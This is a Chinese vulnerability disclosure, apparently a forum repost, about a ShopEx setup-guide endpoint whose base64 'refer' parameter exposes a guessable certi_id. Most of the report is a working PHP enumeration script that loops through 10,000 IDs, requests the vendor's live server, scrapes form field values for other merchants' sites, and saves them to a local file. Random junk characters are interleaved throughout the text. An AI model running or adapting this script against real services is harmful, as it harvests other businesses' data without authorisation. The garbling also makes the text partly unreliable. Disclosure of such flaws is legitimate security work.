|
简要描述:
8 i; z. p* B& GShopEx某接口缺陷,可遍历所有网站
. ^; m+ @+ x* j* T& N1 a; [- K详细说明:, F r# J2 {. N5 _0 P' G
问题出现在shopex 网店使用向导页面 6 w0 t$ A6 W2 p6 H B* i& m
4 u, ` _# k. E; |) m! E: f/ g5 ], {+ y
0 r$ F4 u' |* }' L' O1 Q, F) R
+ v! a2 c5 k ~5 Y! M6 bhttp://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=
; R1 v/ V' @+ T- s! r3 L$ n% W. F. Y& t. i/ K2 ?$ J
9 q9 s" L0 b2 V( {! K% {9 ^9 P8 j8 |& R$ ^: y- k6 z
refer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"} D7 n2 }; A! r3 T$ C4 z3 ^# ^+ Q
, d2 }9 Z, u& A g# I
. o+ T% J' {4 j. b4 D" l4 o
/ z' I; M4 m, n! e% x我们修改certi_id 即可遍历所有使用了ShopEx程序的网站 - m1 R( A2 \: s
7 q# L! P6 S% Z0 V) N5 O D4 {. i
! N/ T+ d2 |/ v2 a. R* a
<?php8 u( X# n2 }1 l# ]
9 o) j, G& _$ a$ d6 ]# s
for ($i=1; $i < 10000; $i++) { //遍历" \5 {9 Q% P5 z) k! a- j
' j ?& L+ r; u6 ?+ W- Y+ b( N4 k& \/ Y ShowshopExD($i);
6 v0 r2 ~5 }- k" }9 v X1 ^+ W8 k1 ^, W* Q# c P- B9 E
}! R0 W( E' X* _# ^, ~3 L7 B
! Y+ T# k9 O2 c function ShowshopExD($cid) {
' z4 t. x, y" V$ q- @& I _, M5 B9 ~
$url='http://guide.ecos.shopex.cn/step2.php';1 n8 l8 K) A0 W4 T/ v' T' i
) g+ a1 Y' p) b5 H& f/ n+ M $refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');
2 U7 m/ a: J* m) ~' p0 A8 a3 V% N; r4 j. V8 Z i# E5 U
$url = $url.'?refer='.$refer;
0 T' ]# P+ h$ C' e6 d" O- z; L9 v2 Q2 V' {
$ch = curl_init($url);
0 q: q! s8 ^5 j$ F0 [! P, A+ e* |+ Q) O+ R) p. D
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;
9 `1 Q% d' R% N' m- `9 k0 J
; _0 p: e9 G5 {2 B curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;* @& E( ]9 e* P9 a2 s- G
% K; R0 k: J! R v
$result = curl_exec($ch);
$ k5 W9 o5 n" S( p* P% o& K, h6 h# ?! K6 [, Q3 H- j
$result = mb_convert_encoding($result, "gb2312", "UTF-8");5 c: _+ F& d' y u" N. ~3 Z
6 N- M& d4 C3 F, h5 c4 ~' ^; J, D7 p if(strpos($result,$refer))1 n7 J: ]+ f5 v- v5 T- K# z
/ y! w6 l% B3 ]# ]
{
( Q* n2 ^! m5 S0 ?2 G6 N( `8 B0 t1 [# e4 Q8 A6 R
$fp = fopen("c:/shopEx.txt",'ab'); //保存文件8 V" M: G7 d& S: y B5 s, p
. `3 m5 K4 b9 O8 X# P( p, m preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);
* G0 S9 |1 G6 ?/ z2 M4 x, ]8 L; \* y/ G6 K+ h
foreach ($value[1] as $key) {$ s/ {+ c; ]% J- _$ q, E
0 K6 `4 A- ~# F# }; ~ preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);
% V( A2 C# Q Z
( E$ l3 E# ^. z9 b. l! a% O: H echo $res[1][0].':'.$res[3][0]."\r\n";
- @, A, t+ D$ i9 t8 Q" o9 T" B6 ~8 c, h( ~% j( B6 c4 q
$col =$res[1][0].':'.$res[3][0]."\r\n";
2 ~' Z9 H: b6 m i
& R( ?2 r. j. i% Y1 O fwrite($fp, $col, strlen($col)); 4 ~5 E) [8 i. N) N, w
7 R+ E; Y h i) R$ v9 F3 z' ] }) ^) \1 _& g2 I z, B0 Y1 R! S
5 w% |& r" R+ P8 u% p echo '--------------------------------'."\r\n";
7 i/ r$ T) o+ U( @ k: K H
0 ^ E. a/ s7 j4 Z) ^ fclose($fp); " M/ q* K- S9 f( C; q3 J
& I1 w9 I" P1 ?) X1 {, }
}
" Q, N- ?, d( ~, C# D; Q) M I+ R- m7 p, B1 E6 c. t
flush();: a( m( y% k7 Q& G. L' m0 V
$ |- x1 x# Y: h) h9 Y+ A8 I( v) I
curl_close($ch);
5 m7 {+ c% v- c) r; v, Y3 m( @% L0 c
}
5 i3 W( ?6 b s. N
5 h9 u* P- l7 l?>) K9 f, W3 ~$ m- [) @
漏洞证明:
/ }4 \. a' b/ f- d' x Mhttp://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
1 X4 l) M- J/ U7 L3 r- Y8 X9 R' N& Jrefer换成其他加密方式
! i/ r& @" S+ D ?2 R, Y& z |
|